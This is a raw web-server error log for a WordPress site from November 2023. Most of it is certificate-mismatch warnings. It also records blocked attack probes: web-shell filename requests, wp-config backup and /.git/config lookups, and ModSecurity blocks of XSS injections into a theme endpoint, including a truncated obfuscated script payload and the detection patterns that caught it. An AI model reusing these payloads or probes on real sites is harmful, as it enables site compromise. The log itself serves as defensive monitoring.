server name [Tue Nov 07 03:10:57.479592 2023] [ssl:warn] [pid 28176:tid 140545455499136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 07 03:10:59.827970 2023] [ssl:warn] [pid 28593:tid 139920985945984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 07 03:11:08.005221 2023] [ssl:warn] [pid 28598:tid 139920985945984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 07 15:20:17.477931 2023] [autoindex:error] [pid 29149:tid 139920538515200] [client 141.94.207.53:49602] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 07 22:29:17.544971 2023] [:error] [pid 29149:tid 139920786417408] [client 165.22.240.78:58314] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/ .php [Tue Nov 07 22:29:17.776868 2023] [:error] [pid 30572:tid 139920639227648] [client 165.22.240.78:58316] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dx.php [Wed Nov 08 03:49:22.686596 2023] [ssl:warn] [pid 22998:tid 139968039901056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 08 03:49:26.883835 2023] [ssl:warn] [pid 23001:tid 139968039901056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 08 03:49:27.251560 2023] [ssl:warn] [pid 23001:tid 139968039901056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 08 03:49:28.929846 2023] [ssl:warn] [pid 23001:tid 139968039901056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 08 03:49:31.182114 2023] [ssl:warn] [pid 23418:tid 140071535298432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 08 03:49:39.430946 2023] [ssl:warn] [pid 23420:tid 140071535298432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 08 08:54:32.982725 2023] [:error] [pid 23439:tid 140071318984448] [client 192.46.209.61:45196] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Nov 08 08:54:34.118178 2023] [:error] [pid 23439:tid 140071122446080] [client 192.46.209.61:45198] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Nov 08 09:45:29.881486 2023] [:error] [pid 23437:tid 140071147624192] [client 179.43.191.18:46298] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Nov 08 09:45:30.199119 2023] [:error] [pid 23437:tid 140071181195008] [client 179.43.191.18:46300] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Nov 08 15:44:05.486694 2023] [autoindex:error] [pid 23439:tid 140071214765824] [client 64.91.249.10:55580] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Wed Nov 08 18:15:57.020879 2023] [autoindex:error] [pid 23438:tid 140071327377152] [client 172.105.33.107:59066] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Nov 08 19:45:51.396480 2023] [:error] [pid 23978:tid 140071327377152] [client 13.95.233.74:60684] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Nov 08 19:45:55.700073 2023] [:error] [pid 23437:tid 140071172802304] [client 13.95.233.74:60686] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Nov 09 03:32:23.956369 2023] [ssl:warn] [pid 19355:tid 140257844426624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 09 03:32:32.154727 2023] [ssl:warn] [pid 19358:tid 140257844426624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 09 03:32:33.577596 2023] [ssl:warn] [pid 19358:tid 140257844426624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 09 03:32:35.745478 2023] [ssl:warn] [pid 19358:tid 140257844426624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 09 03:32:38.018865 2023] [ssl:warn] [pid 19808:tid 140389223966592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 09 03:32:46.202743 2023] [ssl:warn] [pid 19812:tid 140389223966592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 09 18:25:50.492365 2023] [ssl:warn] [pid 19812:tid 140389223966592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 09 18:26:03.378721 2023] [ssl:warn] [pid 19812:tid 140389223966592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 09 21:20:01.389774 2023] [:error] [pid 2968:tid 140388832593664] [client 73.85.11.10:37676] [client 73.85.11.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config-sample.bak"] [unique_id "ZU2TUe9JV6lNSgFcZGpPyAAAANA"] [Fri Nov 10 03:28:20.835407 2023] [ssl:warn] [pid 26937:tid 139850112530304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 03:28:29.037925 2023] [ssl:warn] [pid 26940:tid 139850112530304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 03:28:29.526552 2023] [ssl:warn] [pid 26940:tid 139850112530304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 03:28:31.482679 2023] [ssl:warn] [pid 26940:tid 139850112530304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 03:28:33.755677 2023] [ssl:warn] [pid 27354:tid 140587194734464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 03:28:41.959200 2023] [ssl:warn] [pid 27358:tid 140587194734464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 08:28:44.750825 2023] [autoindex:error] [pid 27382:tid 140586778564352] [client 179.43.191.18:51306] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/.well-known/index.php [Fri Nov 10 09:14:00.907476 2023] [ssl:warn] [pid 27358:tid 140587194734464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 09:14:01.209884 2023] [ssl:warn] [pid 27358:tid 140587194734464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 16:03:57.698407 2023] [:error] [pid 13341:tid 140586995205888] [client 78.10.113.136:33830] [client 78.10.113.136] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZU6avaxHH7UV-MCd0VXXeQAAAMI"] [Fri Nov 10 16:40:42.445407 2023] [ssl:warn] [pid 27358:tid 140587194734464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 16:40:52.803906 2023] [ssl:warn] [pid 27358:tid 140587194734464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 10 21:21:44.928264 2023] [:error] [pid 14831:tid 140586786957056] [client 194.228.128.117:44128] [client 194.228.128.117] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "ZU7lONkgHLZ0pK8E2OAkqgAAAFI"] [Fri Nov 10 22:15:50.404418 2023] [:error] [pid 14832:tid 140586854098688] [client 203.186.166.210:45148] [client 203.186.166.210] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.com"] [unique_id "ZU7x5qxb5tgyJvwBIKUifQAAAIo"] [Fri Nov 10 23:08:42.544068 2023] [:error] [pid 15250:tid 140586828920576] [client 118.232.219.9:46390] [client 118.232.219.9] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.conf"] [unique_id "ZU7-Ssd5ZQMFQVmLguKF4gAAAM0"] [Sat Nov 11 00:02:37.526408 2023] [:error] [pid 14831:tid 140587011991296] [client 90.3.243.154:47320] [client 90.3.243.154] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cs"] [unique_id "ZU8K7dkgHLZ0pK8E2OAl9QAAAEA"] [Sat Nov 11 00:54:57.627654 2023] [:error] [pid 14831:tid 140586753386240] [client 144.137.69.160:48388] [client 144.137.69.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".csproj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.csproj"] [unique_id "ZU8XMdkgHLZ0pK8E2OAmKAAAAFY"] [Sat Nov 11 03:37:23.927294 2023] [ssl:warn] [pid 28391:tid 140596693469056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 11 03:37:36.137107 2023] [ssl:warn] [pid 28393:tid 140596693469056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 11 03:37:36.512900 2023] [ssl:warn] [pid 28393:tid 140596693469056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 11 03:37:38.409572 2023] [ssl:warn] [pid 28393:tid 140596693469056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 11 03:37:40.666940 2023] [ssl:warn] [pid 28816:tid 139930975651712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 11 03:37:44.895061 2023] [ssl:warn] [pid 28818:tid 139930975651712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 11 13:40:36.947133 2023] [:error] [pid 28842:tid 139930646841088] [client 136.37.116.102:33496] [client 136.37.116.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "ZU_KpHS2ILnKk3JRLUENIAAAAIk"] [Sun Nov 12 03:43:29.046328 2023] [ssl:warn] [pid 13212:tid 139988746639232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 12 03:43:37.270442 2023] [ssl:warn] [pid 13213:tid 139988746639232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 12 03:43:37.667211 2023] [ssl:warn] [pid 13213:tid 139988746639232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 12 03:43:39.476131 2023] [ssl:warn] [pid 13213:tid 139988746639232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 12 03:43:41.740008 2023] [ssl:warn] [pid 13630:tid 139958277777280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 12 03:43:49.933881 2023] [ssl:warn] [pid 13634:tid 139958277777280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 02:34:54.667991 2023] [autoindex:error] [pid 13651:tid 139957901399808] [client 94.156.69.32:50344] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Nov 13 02:35:04.353204 2023] [autoindex:error] [pid 14584:tid 139957842650880] [client 94.156.69.32:50348] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Nov 13 03:41:22.207686 2023] [ssl:warn] [pid 25997:tid 140199566059392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 03:41:30.501243 2023] [ssl:warn] [pid 26004:tid 140199566059392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 03:41:30.962596 2023] [ssl:warn] [pid 26004:tid 140199566059392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 03:41:32.714284 2023] [ssl:warn] [pid 26004:tid 140199566059392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 03:41:35.014773 2023] [ssl:warn] [pid 26420:tid 140228288673664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 03:41:43.206463 2023] [ssl:warn] [pid 26427:tid 140228288673664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 03:41:43.939919 2023] [ssl:warn] [pid 26427:tid 140228288673664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:05:46.271419 2023] [ssl:warn] [pid 8297:tid 139876563695488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:05:50.602606 2023] [ssl:warn] [pid 8313:tid 139876563695488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:05:50.972598 2023] [ssl:warn] [pid 8313:tid 139876563695488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:05:53.127256 2023] [ssl:warn] [pid 8313:tid 139876563695488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:05:55.423663 2023] [ssl:warn] [pid 8815:tid 140622237480832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:06:03.628154 2023] [ssl:warn] [pid 9138:tid 140622237480832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:13:18.244149 2023] [ssl:warn] [pid 9138:tid 140622237480832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:13:26.514255 2023] [ssl:warn] [pid 9138:tid 140622237480832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:13:57.594077 2023] [ssl:warn] [pid 9138:tid 140622237480832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:16:22.455372 2023] [ssl:warn] [pid 19354:tid 139781325207424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 09:16:26.647219 2023] [ssl:warn] [pid 19365:tid 139781325207424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 12:00:09.834482 2023] [ssl:warn] [pid 19365:tid 139781325207424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 13 12:00:20.796108 2023] [ssl:warn] [pid 19365:tid 139781325207424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/11/13 20:54:37 [error] 5180#5180: *8021 access forbidden by rule, client: 54.228.161.152, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/11/13 20:54:37 [error] 5181#5181: *8022 access forbidden by rule, client: 54.228.161.152, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/11/13 21:01:07 [error] 5180#5180: *8068 access forbidden by rule, client: 54.228.161.152, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/11/13 21:01:07 [error] 5181#5181: *8069 access forbidden by rule, client: 54.228.161.152, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Nov 13 22:31:09.098631 2023] [:error] [pid 5211:tid 139780977288960] [client 138.68.59.194:44346] [client 138.68.59.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:compiled_css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script>var a=1;var b=2;var c=384573347;</script> found within ARGS:compiled_css: </style><script>var a=1;var b=2;var c=384573347;</script><style>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/tdw/save_css"] [unique_id "ZVLp_fejNQrb_5rgO5NhdwAAAEs"] [Mon Nov 13 22:31:09.446698 2023] [:error] [pid 5689:tid 139781036037888] [client 138.68.59.194:44348] [client 138.68.59.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:compiled_css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: ()===![]&&( found within ARGS:compiled_css: </style><script>var _0x5f2d8b=_0x288e;(function(_0x5e8403,_0x463ae5){var _0x42fd56=_0x288e,_0x529d05=_0x5e8403();while(!![]){try{var _0x5b7e29=parseint(_0x42fd56(0xbf))/0x1*(parseint(_0x42fd56(0xc8))/0x2)+parseint(_0x42fd56(0xd9))/0x3+-parseint(_0x42fd56(0xc9))/0x4+parseint(_0x42fd56(0xc4))/0x5*(-parseint(_0x42fd56(0xce))/0x6)+-parseint(_0x42fd56(0xd2))/0x7+parseint(_0x42fd56(0xeb))/0x8+parseint(_0x42fd56(0xf0))/0x9;if(_0x5b7e29===_0x463ae5)break;..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accu [hostname "investigacionperu.com"] [uri "/wp-json/tdw/save_css"] [unique_id "ZVLp_dSfg4bQZfoHaWJJCgAAAMQ"] [Mon Nov 13 22:31:10.571354 2023] [:error] [pid 5211:tid 139780868183808] [client 185.157.222.11:44354] [client 185.157.222.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:compiled_css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script>var a=1;var b=2;var c=384573347;</script> found within ARGS:compiled_css: </style><script>var a=1;var b=2;var c=384573347;</script><style>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag 